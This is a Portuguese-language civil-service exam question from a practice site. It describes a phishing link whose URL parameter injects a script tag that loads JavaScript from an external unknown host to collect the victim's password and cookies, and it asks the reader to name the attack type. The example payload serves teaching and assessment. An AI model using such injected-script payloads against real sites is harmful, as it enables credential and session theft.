Questões de Concurso Buscando por q839817
Foi encontrada 1 questão
Resolva questões gratuitamente!
Junte-se a mais de 4 milhões de concurseiros!
Considere uma aplicação em que um usuário efetua o login e, posteriormente, é redirecionado para uma tela principal. Isto poderia acontecer por meio de uma URL como a seguinte:
http://www.aplicacaoweb.com.br/Default.aspx?usuario=idusuario
Nesta URL, idusuario indica a conta com a qual o usuário se autenticou no website.
Suponha, agora, que o usuário USER acessou a aplicação e não fez o logoff de sua sessão enquanto estava ativa. Após certo tempo, o usuário USER recebe um e-mail no qual um hacker se faz passar pela empresa que mantém o website. O e-mail fornece um link disfarçado que redireciona USER para uma URL como esta:
http://www.aplicacaoweb.com.br/Default.aspx?usuario=idusuario<script
src='http://sitedesconhecido.com/ataque.js'>solicitarSenha();</script>
Note que o parâmetro usuario contém também uma referência para um arquivo Javascript localizado em outro website. Caso USER clique no link, o código existente no endereço externo solicitaria que ele informasse novamente sua senha e, em caso afirmativo, o atacante receberia a informação desejada, podendo também roubar outras informações presentes em cookies e na sessão ativa naquele instante.
A situação apresentada configura um ataque do tipo